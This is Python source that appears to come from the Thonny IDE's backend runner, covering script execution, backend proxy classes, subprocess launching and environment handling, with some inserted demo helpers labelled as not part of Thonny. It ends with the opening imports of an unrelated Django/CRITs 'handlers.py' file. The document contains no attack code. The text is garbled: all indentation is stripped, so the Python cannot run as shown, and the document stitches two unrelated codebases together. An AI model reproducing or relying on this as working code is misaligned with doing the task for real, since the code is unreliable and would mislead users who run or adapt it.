dlg = InlineCommandDialog(get_workbench(), cmd, title=dialog_title + " ...")
show_dialog(dlg)
return dlg.response
def _postpone_command(self, cmd: CommandToBackend) -> None:
# in case of InlineCommands, discard older same type command
if isinstance(cmd, InlineCommand):
for older_cmd in self._postponed_commands:
if older_cmd.name == cmd.name:
self._postponed_commands.remove(older_cmd)
if len(self._postponed_commands) > 10:
logger.warning("Can't pile up too many commands. This command will be just ignored")
else:
self._postponed_commands.append(cmd)
def _send_postponed_commands(self) -> None:
todo = self._postponed_commands
self._postponed_commands = []
for cmd in todo:
logger.debug("Sending postponed command: %s", cmd)
self.send_command(cmd)
def send_program_input(self, data: str) -> None:
assert self.is_running()
self._proxy.send_program_input(data)
def execute_script(
self,
script_path: str,
args: List[str],
working_directory: Optional[str] = None,
command_name: str = "Run",
) -> None:
if self._proxy.get_cwd() != working_directory:
# create compound command
# start with %cd
cd_cmd_line = construct_cd_command(working_directory) + "\n"
else:
# create simple command
cd_cmd_line = ""
rel_filename = universal_relpath(script_path, working_directory)
cmd_parts = ["%" + command_name, rel_filename] + args
exe_cmd_line = construct_cmd_line(cmd_parts, [EDITOR_CONTENT_TOKEN]) + "\n"
# submit to shell (shell will execute it)
get_shell().submit_magic_command(cd_cmd_line + exe_cmd_line)
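    # Illustrative example of what execute_script() submits: running /home/user/proj/main.py with
    # args ["--trace"] while the backend cwd differs would send roughly
    #     %cd /home/user/proj
    #     %Run main.py --trace
    # to the shell as one magic command (paths and arguments here are placeholders).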
def execute_editor_content(self, command_name, args):
get_shell().submit_magic_command(
construct_cmd_line(
["%" + command_name, "-c", EDITOR_CONTENT_TOKEN] + args, [EDITOR_CONTENT_TOKEN]
)
)
def execute_current(self, command_name: str) -> None:
"""
This method's job is to create a command for running/debugging
current file/script and submit it to shell
"""
if not self.is_waiting_toplevel_command():
self.restart_backend(True, False, 2)
filename = get_saved_current_script_filename()
if not filename:
# user has cancelled file saving
return
if (
is_remote_path(filename)
and not self._proxy.can_run_remote_files()
or is_local_path(filename)
and not self._proxy.can_run_local_files()
):
self.execute_editor_content(command_name, self._get_active_arguments())
else:
if get_workbench().get_option("run.auto_cd") and command_name[0].isupper():
working_directory = get_target_dirname_from_editor_filename(filename)
else:
working_directory = self._proxy.get_cwd()
if is_local_path(filename):
target_path = filename
else:
target_path = extract_target_path(filename)
self.execute_script(
target_path, self._get_active_arguments(), working_directory, command_name
)
def _get_active_arguments(self):
if get_workbench().get_option("view.show_program_arguments"):
args_str = get_workbench().get_option("run.program_arguments")
get_workbench().log_program_arguments_string(args_str)
return shlex.split(args_str)
else:
return []
def cmd_run_current_script_enabled(self) -> bool:
return (
get_workbench().get_editor_notebook().get_current_editor() is not None
and "run" in get_runner().get_supported_features()
)
def _cmd_run_current_script_in_terminal_enabled(self) -> bool:
return (
self._proxy
and "run_in_terminal" in self._proxy.get_supported_features()
and self.cmd_run_current_script_enabled()
)
def cmd_run_current_script(self) -> None:
if get_workbench().in_simple_mode():
get_workbench().hide_view("VariablesView")
self.execute_current("Run")
def _cmd_run_current_script_in_terminal(self) -> None:
if inside_flatpak():
show_command_not_available_in_flatpak_message()
return
filename = get_saved_current_script_filename()
if not filename:
return
self._proxy.run_script_in_terminal(
filename,
self._get_active_arguments(),
get_workbench().get_option("run.run_in_terminal_python_repl"),
get_workbench().get_option("run.run_in_terminal_keep_open"),
)
def _cmd_interrupt(self) -> None:
if self._proxy is not None:
if _console_allocated:
self._proxy.interrupt()
else:
messagebox.showerror(
"No console",
"Can't interrupt as console was not allocated.\n\nUse Stop/Restart instead.",
master=self,
)
else:
logger.warning("User tried interrupting without proxy")
def _cmd_interrupt_with_shortcut(self, event=None):
if not self._cmd_interrupt_enabled():
return None
if not running_on_mac_os(): # on Mac Ctrl+C is not used for Copy.
# Disable Ctrl+C interrupt in editor and shell, when some text is selected
# (assuming user intended to copy instead of interrupting)
widget = get_workbench().focus_get()
if isinstance(widget, tk.Text):
if len(widget.tag_ranges("sel")) > 0:
# this test is reliable, unlike selection_get below
return None
elif isinstance(widget, (tk.Listbox, ttk.Entry, tk.Entry, tk.Spinbox)):
try:
selection = widget.selection_get()
if isinstance(selection, str) and len(selection) > 0:
# Assuming user meant to copy, not interrupt
# (IDLE seems to follow same logic)
# NB! This is not perfect, as in Linux the selection can be in another app
# ie. there may be no selection in Thonny actually.
# In other words, Ctrl+C interrupt may be dropped without reason
# when given inside the widgets listed above.
return None
except Exception:
# widget either doesn't have selection_get or it
# gave error (can happen without selection on Ubuntu)
pass
self._cmd_interrupt()
return "break"
def _cmd_interrupt_enabled(self) -> bool:
return self._proxy and self._proxy.is_connected()
def cmd_stop_restart(self) -> None:
if get_workbench().in_simple_mode():
get_workbench().hide_view("VariablesView")
self.restart_backend(True)
def disconnect(self):
proxy = self.get_backend_proxy()
assert hasattr(proxy, "disconnect")
proxy.disconnect()
def disconnect_enabled(self):
return hasattr(self.get_backend_proxy(), "disconnect")
def ctrld(self):
proxy = self.get_backend_proxy()
if not proxy:
return
if get_shell().has_pending_input():
messagebox.showerror(
"Can't perform this action",
"Ctrl+D only has effect on an empty line / prompt.\n"
+ "Submit current input (press ENTER) and try again",
master=self,
)
return
proxy.send_command(EOFCommand())
self._set_state("running")
def ctrld_enabled(self):
proxy = self.get_backend_proxy()
return proxy and proxy.is_connected()
def _poll_backend_messages(self) -> None:
"""I chose polling instead of event_generate in listener thread,
because event_generate across threads is not reliable
http://www.thecodingforums.com/threads/more-on-tk-event_generate-and-threads.359615/
"""
self._polling_after_id = None
if self._pull_backend_messages() is False:
return
self._polling_after_id = get_workbench().after(20, self._poll_backend_messages)
def _pull_backend_messages(self):
# Don't process too many messages in single batch, allow screen updates
# and user actions between batches.
# Mostly relevant when backend prints a lot quickly.
msg_count = 0
max_msg_count = 10
while self._proxy is not None and msg_count < max_msg_count:
try:
msg = self._proxy.fetch_next_message()
if not msg:
break
# logger.debug(
# "RUNNER GOT: %s, %s in state: %s", msg.event_type, msg, self.get_state()
# )
msg_count += 1
except BackendTerminatedError as exc:
self._report_backend_crash(exc)
self.destroy_backend()
return False
if msg.get("SystemExit", False):
self.restart_backend(True)
return False
# change state
if isinstance(msg, ToplevelResponse):
self._set_state("waiting_toplevel_command")
elif isinstance(msg, DebuggerResponse):
self._set_state("waiting_debugger_command")
elif isinstance(msg, InlineResponse):
# next inline command won't be sent before response from the last has arrived
self._proxy.running_inline_command = False
else:
"other messages don't affect the state"
# Publish the event
# NB! This may cause another command to be sent before we get to postponed commands.
try:
self._publishing_events = True
class_event_type = type(msg).__name__
get_workbench().event_generate(class_event_type, event=msg) # more general event
if msg.event_type != class_event_type:
# more specific event
get_workbench().event_generate(msg.event_type, event=msg)
finally:
self._publishing_events = False
# TODO: is it necessary???
# https://stackoverflow.com/a/13520271/261181
# get_workbench().update()
self._send_postponed_commands()
def _report_backend_crash(self, exc: Exception) -> None:
returncode = getattr(exc, "returncode", "?")
err = "Backend terminated or disconnected."
try:
faults_file = os.path.join(THONNY_USER_DIR, "backend_faults.log")
if os.path.exists(faults_file):
with open(faults_file, encoding="ASCII") as fp:
err += fp.read()
except Exception:
logger.exception("Failed retrieving backend faults")
err = err.strip() + " Use 'Stop/Restart' to restart.\n"
if returncode != EXPECTED_TERMINATION_CODE:
get_workbench().event_generate("ProgramOutput", stream_name="stderr", data="\n" + err)
get_workbench().become_active_window(False)
def restart_backend(self, clean: bool, first: bool = False, wait: float = 0) -> None:
"""Recreate (or replace) backend proxy / backend process."""
if not first:
get_shell().restart()
get_shell().update_idletasks()
self.destroy_backend()
backend_name = get_workbench().get_option("run.backend_name")
if backend_name not in get_workbench().get_backends():
raise UserError(
"Can't find backend '{}'. Please select another backend from options".format(
backend_name
)
)
backend_class = get_workbench().get_backends()[backend_name].proxy_class
self._set_state("running")
self._proxy = None
self._proxy = backend_class(clean)
self._poll_backend_messages()
if wait:
start_time = time.time()
while not self.is_waiting_toplevel_command() and time.time() - start_time <= wait:
# self._pull_backend_messages()
get_workbench().update()
sleep(0.01)
get_workbench().event_generate("BackendRestart", full=True)
def destroy_backend(self) -> None:
if self._polling_after_id is not None:
get_workbench().after_cancel(self._polling_after_id)
self._polling_after_id = None
self._postponed_commands = []
if self._proxy:
self._proxy.destroy()
self._proxy = None
get_workbench().event_generate("BackendTerminated")
def get_local_executable(self) -> Optional[str]:
if self._proxy is None:
return None
else:
return self._proxy.get_local_executable()
def get_backend_proxy(self) -> "BackendProxy":
return self._proxy
def _check_alloc_console(self) -> None:
if sys.executable.endswith("pythonw.exe"):
# These don't have console allocated.
# Console is required for sending interrupts.
# AllocConsole would be easier but flashes console window
import ctypes
kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
exe = sys.executable.replace("pythonw.exe", "python.exe")
cmd = [exe, "-c", "print('Hi!'); input()"]
child = subprocess.Popen(
cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
)
child.stdout.readline()
result = kernel32.AttachConsole(child.pid)
if not result:
err = ctypes.get_last_error()
logger.info("Could not allocate console. Error code: " + str(err))
child.stdin.write(b"\n")
try:
child.stdin.flush()
except Exception:
# May happen eg. when installation path has "&" in it
# See https://bitbucket.org/plas/thonny/issues/508/cant-allocate-windows-console-when
                # Without flush the console window becomes visible, but Thonny can still be used
logger.exception("Problem with finalizing console allocation")
def ready_for_remote_file_operations(self, show_message=False):
if not self._proxy or not self.supports_remote_files():
return False
ready = self._proxy.ready_for_remote_file_operations()
if not ready and show_message:
if not self._proxy.is_connected():
msg = "Device is not connected"
else:
msg = (
"Device is busy -- can't perform this action now."
+ "\nPlease wait or cancel current work and try again!"
)
messagebox.showerror("Can't complete", msg, master=get_workbench())
return ready
def get_supported_features(self) -> Set[str]:
if self._proxy is None:
return set()
else:
return self._proxy.get_supported_features()
def supports_remote_files(self):
if self._proxy is None:
return False
else:
return self._proxy.supports_remote_files()
def supports_remote_directories(self):
if self._proxy is None:
return False
else:
return self._proxy.supports_remote_directories()
def get_node_label(self):
if self._proxy is None:
return "Back-end"
else:
return self._proxy.get_node_label()
def using_venv(self) -> bool:
from thonny.plugins.cpython import CPythonProxy
return isinstance(self._proxy, CPythonProxy) and self._proxy._in_venv
class BackendProxy:
"""Communicates with backend process.
All communication methods must be non-blocking,
ie. suitable for calling from GUI thread."""
# backend_name will be overwritten on Workbench.add_backend
# Subclasses don't need to worry about it.
backend_name = None
backend_description = None
def __init__(self, clean: bool) -> None:
"""Initializes (or starts the initialization of) the backend process.
Backend is considered ready when the runner gets a ToplevelResponse
with attribute "welcome_text" from fetch_next_message.
"""
self.running_inline_command = False
def send_command(self, cmd: CommandToBackend) -> Optional[str]:
"""Send the command to backend. Return None, 'discard' or 'postpone'"""
raise NotImplementedError()
def send_program_input(self, data: str) -> None:
"""Send input data to backend"""
raise NotImplementedError()
def fetch_next_message(self):
"""Read next message from the queue or None if queue is empty"""
raise NotImplementedError()
def run_script_in_terminal(self, script_path, args, interactive, keep_open):
raise NotImplementedError()
def get_sys_path(self):
"backend's sys.path"
return []
def get_backend_name(self):
return type(self).backend_name
def get_pip_gui_class(self):
return None
def interrupt(self):
"""Tries to interrupt current command without resetting the backend"""
pass
def destroy(self):
"""Called when Thonny no longer needs this instance
(Thonny gets closed or new backend gets selected)
"""
pass
def is_connected(self):
return True
def get_local_executable(self):
"""Return system command for invoking current interpreter"""
return None
def get_supported_features(self):
return {"run"}
def get_node_label(self):
"""Used as files caption if back-end has separate files"""
return "Back-end"
def get_full_label(self):
"""Used in pip GUI title"""
return self.get_node_label()
def supports_remote_files(self):
"""Whether remote file browser should be presented with this back-end"""
return False
def uses_local_filesystem(self):
"""Whether it runs code from local files"""
return True
def supports_remote_directories(self):
return False
def supports_trash(self):
return True
def can_run_remote_files(self):
raise NotImplementedError()
def can_run_local_files(self):
raise NotImplementedError()
def ready_for_remote_file_operations(self):
return False
def get_cwd(self):
return None
def get_clean_description(self):
return self.backend_description
@classmethod
def get_current_switcher_configuration(cls):
"""returns the dict of configuration entries that distinguish current backend conf from other
items in the backend switcher"""
return {"run.backend_name": cls.backend_name}
@classmethod
def get_switcher_entries(cls):
"""
Each returned entry creates one item in the backend switcher menu.
"""
return [(cls.get_current_switcher_configuration(), cls.backend_description)]
def has_custom_system_shell(self):
return False
def open_custom_system_shell(self):
raise NotImplementedError()
class SubprocessProxy(BackendProxy):
def __init__(self, clean: bool, executable: Optional[str] = None) -> None:
super().__init__(clean)
if executable:
self._executable = executable
else:
self._executable = get_interpreter_for_subprocess()
if ".." in self._executable:
self._executable = os.path.normpath(self._executable)
if not os.path.isfile(self._executable):
raise UserError(
"Interpreter '%s' does not exist. Please check the configuration!"
% self._executable
)
self._welcome_text = ""
self._proc = None
self._terminated_readers = 0
self._response_queue = None
self._sys_path = []
self._usersitepackages = None
self._gui_update_loop_id = None
self._in_venv = None
self._cwd = self._get_initial_cwd() # pylint: disable=assignment-from-none
self._start_background_process(clean=clean)
def _get_initial_cwd(self):
return None
def _get_environment(self):
env = get_environment_for_python_subprocess(self._executable)
# variables controlling communication with the back-end process
env["PYTHONIOENCODING"] = "utf-8"
# because cmd line option -u won't reach child processes
# see https://github.com/thonny/thonny/issues/808
env["PYTHONUNBUFFERED"] = "1"
# Let back-end know about plug-ins
env["THONNY_USER_DIR"] = THONNY_USER_DIR
env["THONNY_FRONTEND_SYS_PATH"] = repr(sys.path)
env["THONNY_LANGUAGE"] = get_workbench().get_option("general.language")
if thonny.in_debug_mode():
env["THONNY_DEBUG"] = "1"
elif "THONNY_DEBUG" in env:
del env["THONNY_DEBUG"]
return env
def _start_background_process(self, clean=None, extra_args=[]):
# deque, because in one occasion I need to put messages back
self._response_queue = collections.deque()
if not os.path.exists(self._executable):
raise UserError(
"Interpreter (%s) not found. Please recheck corresponding option!"
% self._executable
)
cmd_line = (
[
self._executable,
"-u", # unbuffered IO
"-B", # don't write pyo/pyc files
# (to avoid problems when using different Python versions without write permissions)
]
+ self._get_launcher_with_args()
+ extra_args
)
creationflags = 0
if running_on_windows():
creationflags = subprocess.CREATE_NEW_PROCESS_GROUP
debug("Starting the backend: %s %s", cmd_line, get_workbench().get_local_cwd())
extra_params = {}
if sys.version_info >= (3, 6):
extra_params["encoding"] = "utf-8"
self._proc = subprocess.Popen(
cmd_line,
bufsize=0,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=self._get_launch_cwd(),
env=self._get_environment(),
universal_newlines=True,
creationflags=creationflags,
**extra_params,
)
# setup asynchronous output listeners
self._terminated_readers = 0
Thread(target=self._listen_stdout, args=(self._proc.stdout,), daemon=True).start()
Thread(target=self._listen_stderr, args=(self._proc.stderr,), daemon=True).start()
def _get_launch_cwd(self):
return self.get_cwd() if self.uses_local_filesystem() else None
def _get_launcher_with_args(self):
raise NotImplementedError()
def send_command(self, cmd: CommandToBackend) -> Optional[str]:
"""Send the command to backend. Return None, 'discard' or 'postpone'"""
if isinstance(cmd, ToplevelCommand) and cmd.name[0].isupper():
self._clear_environment()
if isinstance(cmd, ToplevelCommand):
# required by SshCPythonBackend for creating fresh target process
cmd["expected_cwd"] = self._cwd
method_name = "_cmd_" + cmd.name
if hasattr(self, method_name):
getattr(self, method_name)(cmd)
else:
self._send_msg(cmd)
def _send_msg(self, msg):
if not self._proc:
logger.warning("Ignoring command without active backend process")
return
self._proc.stdin.write(serialize_message(msg) + "\n")
self._proc.stdin.flush()
def _clear_environment(self):
pass
def send_program_input(self, data):
self._send_msg(InputSubmission(data))
def process_is_alive(self):
return self._proc is not None and self._proc.poll() is None
def is_terminated(self):
return not self.process_is_alive()
def is_connected(self):
return self.process_is_alive()
def get_sys_path(self):
return self._sys_path
def destroy(self):
self._close_backend()
def _close_backend(self):
if self._proc is not None and self._proc.poll() is None:
self._proc.kill()
self._proc = None
self._response_queue = None
def _listen_stdout(self, stdout):
# debug("... started listening to stdout")
# will be called from separate thread
# allow self._response_queue to be replaced while processing
message_queue = self._response_queue
def publish_as_msg(data):
msg = parse_message(data)
if "cwd" in msg:
self.cwd = msg["cwd"]
message_queue.append(msg)
if len(message_queue) > 10:
# Probably backend runs an infinite/long print loop.
# Throttle message throughput in order to keep GUI thread responsive.
while len(message_queue) > 0:
sleep(0.005)
while True:
try:
data = read_one_incoming_message_str(stdout.readline)
except IOError:
sleep(0.1)
continue
# debug("... read some stdout data", repr(data))
if data == "":
break
else:
try:
publish_as_msg(data)
except Exception:
# Can mean the line was from subprocess,
# which can't be captured by stream faking.
# NB! If subprocess printed it without linebreak,
# then the suffix can be thonny message
parts = data.rsplit(common.MESSAGE_MARKER, maxsplit=1)
# print first part as it is
message_queue.append(
BackendEvent("ProgramOutput", data=parts[0], stream_name="stdout")
)
if len(parts) == 2:
second_part = common.MESSAGE_MARKER + parts[1]
try:
publish_as_msg(second_part)
except Exception:
# just print ...
message_queue.append(
BackendEvent(
"ProgramOutput", data=second_part, stream_name="stdout"
)
)
self._terminated_readers += 1
def _listen_stderr(self, stderr):
# stderr is used only for debugger debugging
while True:
data = read_one_incoming_message_str(stderr.readline)
if data == "":
break
else:
self._response_queue.append(
BackendEvent("ProgramOutput", stream_name="stderr", data=data)
)
self._terminated_readers += 1
def _store_state_info(self, msg):
if "cwd" in msg:
self._cwd = msg["cwd"]
self._publish_cwd(msg["cwd"])
if msg.get("welcome_text"):
self._welcome_text = msg["welcome_text"]
if "in_venv" in msg:
self._in_venv = msg["in_venv"]
if "sys_path" in msg:
self._sys_path = msg["sys_path"]
if "usersitepackages" in msg:
self._usersitepackages = msg["usersitepackages"]
if "prefix" in msg:
self._sys_prefix = msg["prefix"]
if "exe_dirs" in msg:
self._exe_dirs = msg["exe_dirs"]
if msg.get("executable"):
self._reported_executable = msg["executable"]
def _publish_cwd(self, cwd):
if self.uses_local_filesystem():
get_workbench().set_local_cwd(cwd)
def get_supported_features(self):
return {"run"}
def get_site_packages(self):
# NB! site.sitepackages may not be present in virtualenv
for d in self._sys_path:
if ("site-packages" in d or "dist-packages" in d) and path_startswith(
d, self._sys_prefix
):
return d
return None
def get_user_site_packages(self):
return self._usersitepackages
def get_cwd(self):
return self._cwd
def get_exe_dirs(self):
return self._exe_dirs
def fetch_next_message(self):
if not self._response_queue or len(self._response_queue) == 0:
if self.is_terminated() and self._terminated_readers == 2:
raise BackendTerminatedError(self._proc.returncode if self._proc else None)
else:
return None
msg = self._response_queue.popleft()
self._store_state_info(msg)
if msg.event_type == "ProgramOutput":
# combine available small output messages to one single message,
# in order to put less pressure on UI code
wait_time = 0.01
total_wait_time = 0
while True:
if len(self._response_queue) == 0:
if _ends_with_incomplete_ansi_code(msg["data"]) and total_wait_time < 0.1:
# Allow reader to send the remaining part
sleep(wait_time)
total_wait_time += wait_time
continue
else:
return msg
else:
next_msg = self._response_queue.popleft()
if (
next_msg.event_type == "ProgramOutput"
and next_msg["stream_name"] == msg["stream_name"]
and (
len(msg["data"]) + len(next_msg["data"]) <= OUTPUT_MERGE_THRESHOLD
and ("\n" not in msg["data"] or not io_animation_required)
or _ends_with_incomplete_ansi_code(msg["data"])
)
):
msg["data"] += next_msg["data"]
else:
# not to be sent in the same block, put it back
self._response_queue.appendleft(next_msg)
return msg
else:
return msg
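# --- Hedged example (not part of Thonny): the output-merging idea used in
# fetch_next_message() above, reduced to plain dicts and a deque so it is self-contained.
# The ANSI and io_animation special cases are omitted, and merge_threshold stands in for
# the module's OUTPUT_MERGE_THRESHOLD constant.
def _demo_merge_program_output(queue_items, merge_threshold=1000):
    from collections import deque
    queue = deque(queue_items)
    merged = []
    while queue:
        msg = queue.popleft()
        while (
            queue
            and msg["event"] == "ProgramOutput"
            and queue[0]["event"] == "ProgramOutput"
            and queue[0]["stream"] == msg["stream"]
            and len(msg["data"]) + len(queue[0]["data"]) <= merge_threshold
        ):
            # glue small consecutive chunks of the same stream into one UI update
            msg = dict(msg, data=msg["data"] + queue.popleft()["data"])
        merged.append(msg)
    return merged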
def _ends_with_incomplete_ansi_code(data):
pos = data.rfind("\033")
if pos == -1:
return False
# note ANSI_CODE_TERMINATOR also includes [
params_and_terminator = data[pos + 2 :]
return not ANSI_CODE_TERMINATOR.search(params_and_terminator)
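# --- Hedged example (not part of Thonny): a self-contained sketch of the incomplete-ANSI
# check above. It assumes a terminator pattern equivalent to the module-level
# ANSI_CODE_TERMINATOR (any final byte of a CSI sequence); the real constant may differ.
def _demo_ends_with_incomplete_ansi_code():
    import re
    terminator = re.compile("[@-~]")  # final bytes of a CSI sequence, per ECMA-48
    def ends_incomplete(data):
        pos = data.rfind("\033")
        if pos == -1:
            return False
        return not terminator.search(data[pos + 2:])
    assert ends_incomplete("hello \033[3")        # colour code cut off mid-stream
    assert not ends_incomplete("hello \033[31m")  # fully terminated code
    assert not ends_incomplete("plain text")      # no escape character at all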
def is_bundled_python(executable):
return os.path.exists(os.path.join(os.path.dirname(executable), "thonny_python.ini"))
def create_backend_python_process(
args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
):
"""Used for running helper commands (eg. pip) on CPython backend.
Assumes current backend is CPython."""
# TODO: if backend == frontend, then delegate to create_frontend_python_process
python_exe = get_runner().get_local_executable()
env = get_environment_for_python_subprocess(python_exe)
env["PYTHONIOENCODING"] = "utf-8"
env["PYTHONUNBUFFERED"] = "1"
# TODO: remove frontend python from path and add backend python to it
return _create_python_process(python_exe, args, stdin, stdout, stderr, env=env)
def create_frontend_python_process(
args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
):
"""Used for running helper commands (eg. for installing plug-ins on by the plug-ins)"""
if _console_allocated:
python_exe = get_interpreter_for_subprocess().replace("pythonw.exe", "python.exe")
else:
python_exe = get_interpreter_for_subprocess().replace("python.exe", "pythonw.exe")
env = get_environment_for_python_subprocess(python_exe)
env["PYTHONIOENCODING"] = "utf-8"
env["PYTHONUNBUFFERED"] = "1"
return _create_python_process(python_exe, args, stdin, stdout, stderr)
def _create_python_process(
python_exe,
args,
stdin=None,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=False,
env=None,
universal_newlines=True,
):
cmd = [python_exe] + args
if running_on_windows():
creationflags = subprocess.CREATE_NEW_PROCESS_GROUP
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
else:
startupinfo = None
creationflags = 0
proc = subprocess.Popen(
cmd,
stdin=stdin,
stdout=stdout,
stderr=stderr,
shell=shell,
env=env,
universal_newlines=universal_newlines,
startupinfo=startupinfo,
creationflags=creationflags,
)
proc.cmd = cmd
return proc
class BackendTerminatedError(Exception):
def __init__(self, returncode=None):
Exception.__init__(self)
self.returncode = returncode
def is_venv_interpreter_of_current_interpreter(executable):
for location in ["..", "."]:
cfg_path = os.path.join(os.path.dirname(executable), location, "pyvenv.cfg")
if os.path.isfile(cfg_path):
with open(cfg_path) as fp:
content = fp.read()
for line in content.splitlines():
if line.replace(" ", "").startswith("home="):
_, home = line.split("=", maxsplit=1)
home = home.strip()
if os.path.isdir(home) and (
is_same_path(home, sys.prefix)
or is_same_path(home, os.path.join(sys.prefix, "bin"))
or is_same_path(home, os.path.join(sys.prefix, "Scripts"))
):
return True
return False
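# --- Hedged illustration (hypothetical content): the check above compares the "home ="
# entry of a pyvenv.cfg found next to (or one level above) the interpreter with sys.prefix.
# A venv created by this interpreter might contain something like:
#
#   home = /usr/local/bin
#   include-system-site-packages = false
#   version = 3.8.10
#
# A minimal sketch of the "home =" extraction under those assumptions:
def _demo_read_venv_home(cfg_text):
    for line in cfg_text.splitlines():
        if line.replace(" ", "").startswith("home="):
            return line.split("=", maxsplit=1)[1].strip()
    return None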
def get_environment_for_python_subprocess(target_executable):
overrides = get_environment_overrides_for_python_subprocess(target_executable)
return get_environment_with_overrides(overrides)
def get_environment_with_overrides(overrides):
env = os.environ.copy()
for key in overrides:
if overrides[key] is None and key in env:
del env[key]
else:
assert isinstance(overrides[key], str)
if key.upper() == "PATH":
update_system_path(env, overrides[key])
else:
env[key] = overrides[key]
return env
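# --- Hedged example (not part of Thonny): the override semantics above in isolation.
# A value of None removes the variable, PATH is merged via update_system_path, and
# everything else is overwritten. The sketch reimplements only the remove/overwrite rules
# so it stays self-contained; the Thonny-specific PATH merge is omitted.
def _demo_apply_overrides(env, overrides):
    env = dict(env)
    for key, value in overrides.items():
        if value is None:
            env.pop(key, None)   # explicit None means "make sure this is unset"
        else:
            env[key] = value
    return env
# e.g. _demo_apply_overrides({"PYTHONPATH": "/old", "LANG": "C"}, {"PYTHONPATH": None})
# drops PYTHONPATH and leaves LANG untouched.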
def get_environment_overrides_for_python_subprocess(target_executable):
"""Take care of not not confusing different interpreter
with variables meant for bundled interpreter"""
# At the moment I'm tweaking the environment only if current
# exe is bundled for Thonny.
# In remaining cases it is user's responsibility to avoid
# calling Thonny with environment which may be confusing for
# different Pythons called in a subprocess.
this_executable = sys.executable.replace("pythonw.exe", "python.exe")
target_executable = target_executable.replace("pythonw.exe", "python.exe")
interpreter_specific_keys = [
"TCL_LIBRARY",
"TK_LIBRARY",
"LD_LIBRARY_PATH",
"DYLD_LIBRARY_PATH",
"SSL_CERT_DIR",
"SSL_CERT_FILE",
"PYTHONHOME",
"PYTHONPATH",
"PYTHONNOUSERSITE",
"PYTHONUSERBASE",
]
result = {}
if os.path.samefile(
target_executable, this_executable
) or is_venv_interpreter_of_current_interpreter(target_executable):
# bring out some important variables so that they can
# be explicitly set in macOS Terminal
# (If they are set then it's most likely because current exe is in Thonny bundle)
for key in interpreter_specific_keys:
if key in os.environ:
result[key] = os.environ[key]
# never pass some variables to different interpreter
# (even if it's venv or symlink to current one)
if not is_same_path(target_executable, this_executable):
for key in ["PYTHONPATH", "PYTHONHOME", "PYTHONNOUSERSITE", "PYTHONUSERBASE"]:
if key in os.environ:
result[key] = None
else:
# interpreters are not related
# interpreter specific keys most likely would confuse other interpreter
for key in interpreter_specific_keys:
if key in os.environ:
result[key] = None
# some keys should be never passed
for key in [
"PYTHONSTARTUP",
"PYTHONBREAKPOINT",
"PYTHONDEBUG",
"PYTHONNOUSERSITE",
"PYTHONASYNCIODEBUG",
]:
if key in os.environ:
result[key] = None
# venv may not find (correct) Tk without assistance (eg. in Ubuntu)
if is_venv_interpreter_of_current_interpreter(target_executable):
try:
if "TCL_LIBRARY" not in os.environ or "TK_LIBRARY" not in os.environ:
result["TCL_LIBRARY"] = get_workbench().tk.exprstring("$tcl_library")
result["TK_LIBRARY"] = get_workbench().tk.exprstring("$tk_library")
except Exception:
logger.exception("Can't compute Tcl/Tk library location")
return result
def construct_cd_command(path) -> str:
return construct_cmd_line(["%cd", path])
_command_id_counter = 0
def generate_command_id():
global _command_id_counter
_command_id_counter += 1
return "cmd_" + str(_command_id_counter)
class InlineCommandDialog(WorkDialog):
def __init__(
self,
master,
cmd: Union[InlineCommand, Callable],
title,
instructions=None,
output_prelude=None,
autostart=True,
):
self.response = None
self._title = title
self._instructions = instructions
self._cmd = cmd
self.returncode = None
get_shell().set_ignore_program_output(True)
get_workbench().bind("InlineResponse", self._on_response, True)
get_workbench().bind("InlineProgress", self._on_progress, True)
get_workbench().bind("ProgramOutput", self._on_output, True)
super().__init__(master, autostart=autostart)
if output_prelude:
self.append_text(output_prelude)
def get_title(self):
return self._title
def get_instructions(self) -> Optional[str]:
return self._instructions or self._cmd.get("description", "Working...")
def _on_response(self, response):
if response.get("command_id") == getattr(self._cmd, "id"):
logger.debug("Dialog got response: %s", response)
self.response = response
self.returncode = response.get("returncode", None)
success = (
not self.returncode and not response.get("error") and not response.get("errors")
)
if success:
self.set_action_text("Done!")
else:
self.set_action_text("Error")
if response.get("error"):
self.append_text("Error %s\n" % response["error"], stream_name="stderr")
if response.get("errors"):
self.append_text("Errors %s\n" % response["errors"], stream_name="stderr")
if self.returncode:
self.append_text(
"Process returned with code %s\n" % self.returncode, stream_name="stderr"
)
self.report_done(success)
def _on_progress(self, msg):
if msg.get("command_id") != getattr(self._cmd, "id"):
return
if msg.get("value", None) is not None and msg.get("maximum", None) is not None:
self.report_progress(msg["value"], msg["maximum"])
if msg.get("description"):
self.set_action_text(msg["description"])
def _on_output(self, msg):
stream_name = msg.get("stream_name", "stdout")
self.append_text(msg["data"], stream_name)
self.set_action_text_smart(msg["data"])
def start_work(self):
self.send_command_to_backend()
def send_command_to_backend(self):
if not isinstance(self._cmd, CommandToBackend):
# it was a lazy definition
try:
self._cmd = self._cmd()
except Exception as e:
logger.error("Could not produce command for backend", self._cmd)
self.set_action_text("Error!")
self.append_text("Could not produce command for backend\n")
self.append_text("".join(traceback.format_exc()) + "\n")
self.report_done(False)
return
logger.debug("Starting command in dialog: %s", self._cmd)
get_runner().send_command(self._cmd)
def cancel_work(self):
super(InlineCommandDialog, self).cancel_work()
get_runner()._cmd_interrupt()
def close(self):
get_workbench().unbind("InlineResponse", self._on_response)
get_workbench().unbind("InlineProgress", self._on_progress)
super(InlineCommandDialog, self).close()
get_shell().set_ignore_program_output(False)
def get_frontend_python():
# TODO: deprecated (name can be misleading)
warnings.warn("get_frontend_python is deprecated")
return get_interpreter_for_subprocess(sys.executable)
def get_interpreter_for_subprocess(candidate=None):
if candidate is None:
candidate = sys.executable
pythonw = candidate.replace("python.exe", "pythonw.exe")
if not _console_allocated and os.path.exists(pythonw):
return pythonw
else:
return candidate.replace("pythonw.exe", "python.exe")
|
handlers.py
|
import ast
import datetime
import json
import logging
import copy
from django.http import HttpResponse
from multiprocessing import Process
from threading import Thread, local
try:
from mongoengine.base import ValidationError
except ImportError:
from mongoengine.errors import ValidationError
from multiprocessing.pool import Pool, ThreadPool
from django.core.urlresolvers import reverse
from django.conf import settings
from django.shortcuts import render_to_response
from django.template import RequestContext
import crits.services
